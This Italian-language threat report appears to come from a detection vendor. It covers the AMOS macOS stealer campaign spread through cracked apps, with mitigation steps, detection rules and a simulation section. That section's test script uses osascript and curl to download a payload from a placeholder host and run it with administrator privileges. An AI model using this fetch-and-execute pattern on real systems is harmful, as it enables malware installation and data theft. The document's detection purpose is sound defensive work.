AMOS Stealer Attacca macOS Attraverso App “Craccate”
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
Il report descrive una campagna che distribuisce Atomic macOS Stealer (AMOS) camuffandolo da applicazioni crackate o istruendo gli utenti a eseguire comandi terminal copiati e incollati. Una volta eseguito, il malware raccoglie un ampio set di dati sensibili, incluse credenziali, informazioni del browser, portafogli di criptovaluta, file delle applicazioni di messaggistica, profili VPN e documenti personali, per poi esfiltrare i contenuti rubati tramite HTTP o HTTPS. Per evitare il rilevamento statico, gli operatori ruotano i domini e gli URL durante la campagna. L’attività è indirizzata agli utenti macOS, in particolare a quelli che cercano software non ufficiali o piratati.
Indagine
La telemetria di Trend Vision One è stata utilizzata per ricostruire l’intera catena di infezione, iniziando con i download di applicazioni crackate da haxmac.cc, seguiti da reindirizzamenti attraverso domini intermediari, esecuzione di script shell dannosi, creazione di daemon di avvio per la persistenza, staging dei dati in /tmp, compressione in archivi ZIP ed esfiltrazione verso domini rotanti controllati dagli attaccanti. I ricercatori hanno catturato le linee di comando rilevanti, i percorsi dei file e gli indicatori comportamentali associati a ciascuna fase della compromissione.
Mitigazione
Le organizzazioni dovrebbero educare gli utenti sui rischi del software crackato e dei comandi terminal copiati e incollati, applicare i controlli Gatekeeper e notarizzazione, e limitare l’esecuzione di script non necessari sui sistemi macOS. I difensori dovrebbero anche monitorare attività sospette di curl and osascript e bloccare l’accesso a domini e indirizzi IP noti come dannosi. Le rilevazioni degli endpoint dovrebbero concentrarsi sulla creazione non autorizzata di daemon di avvio, il posizionamento nascosto di file e comportamenti insoliti di raccolta o esfiltrazione dei file.
Risposta
Se viene rilevata un’attività di AMOS, isolare l’endpoint interessato, terminare i processi dannosi, rimuovere file nascosti come .helper, .agent, e com.finder.helper.plist, e cancellare qualsiasi dato preparato per l’esfiltrazione. Le credenziali compromesse devono essere revocate e un’analisi forense dovrebbe essere effettuata su qualsiasi archivio recuperato. L’infrastruttura dannosa identificata deve essere bloccata e i contenuti di rilevazione devono essere aggiornati per monitorare i pattern di comando osservati.
Flusso di attacco
Rilevazioni
Uso sospetto di Ditto per archiviazione ed esfiltrazione di file su macOS (tramite creazione_processi)
Visualizza
Possibile staging di più file nella directory TMP per l’esfiltrazione (tramite evento_file)
Visualizza
Atomic MacOS Stealer – Attività FileGrabber
Visualizza
Possibili dati di accesso di Chrome copiati nella directory TMP (tramite creazione_processi)
Visualizza
IOC (HashSha1) per rilevare: Analisi della campagna AMOS Stealer su macOS tramite ‘App’ crackate
Visualizza
IOC (indirizzoIP di origine) per rilevare: Analisi della campagna AMOS Stealer su macOS tramite ‘App’ crackate
Visualizza
IOC (indirizzoIP di destinazione) per rilevare: Analisi della campagna AMOS Stealer su macOS tramite ‘App’ crackate
Visualizza
Rilevamento dell’esecuzione di AMOS Stealer tramite comandi terminal su macOS [creazione processo Linux]
Visualizza
Rilevamento dell’esecuzione di AMOS Stealer tramite AppleScript e Curl [creazione processo Linux]
Visualizza
Esecuzione di Simulazione
Prerequisito: La verifica preliminare della telemetria e del baseline deve essere superata.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) designata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrativa dell’attacco e comandi:
Un avversario ha ottenuto un’esca di phishing che consegna un breve payload AppleScript. Lo script utilizzaosascriptper eseguire un comando shell (sh -c) che invocacurlper scaricare il binario AMOS stealer da un server C2 dannoso, lo memorizza nella~/Library/Application Support/dell’utente, e poi lo esegue con permessi elevati. L’uso delosascript(un binario Apple firmato) maschera l’attività come automazione legittima, mentrecurlfornisce un download di rete furtivo. -
Script di Test di Regressione:
# amos_stealer_simulation.sh # Simula l'esecuzione di AMOS stealer su macOS usando osascript + curl # 1. Definire URL dannoso (utilizzare un segnaposto innocuo per sicurezza) MALICIOUS_URL="https://example.com/malicious_payload.sh" # 2. AppleScript che esegue un comando shell per scaricare ed eseguire il payload APPLESCRIPT=$(cat <<'EOF' do shell script "sh -c 'curl -s -o /tmp/payload.sh "https://example.com/malicious_payload.sh" && chmod +x /tmp/payload.sh && /tmp/payload.sh'" with administrator privileges EOF ) # 3. Eseguire l'AppleScript tramite osascript echo "$APPLESCRIPT" | osascript # 4. Pausa breve per consentire l'esecuzione del payload sleep 5 -
Comandi di Pulizia:
# cleanup_amos_simulation.sh # Rimuove gli artefatti creati dalla simulazione # Rimuovere il payload scaricato rm -f /tmp/payload.sh # Revoca qualsiasi processo temporaneo con privilegi elevati (se ancora in esecuzione) pkill -f "/tmp/payload.sh" || true # Opzionalmente, cancellare la cronologia di esecuzione di AppleScript # (macOS non conserva una cronologia persistente per osascript) echo "Pulizia completata."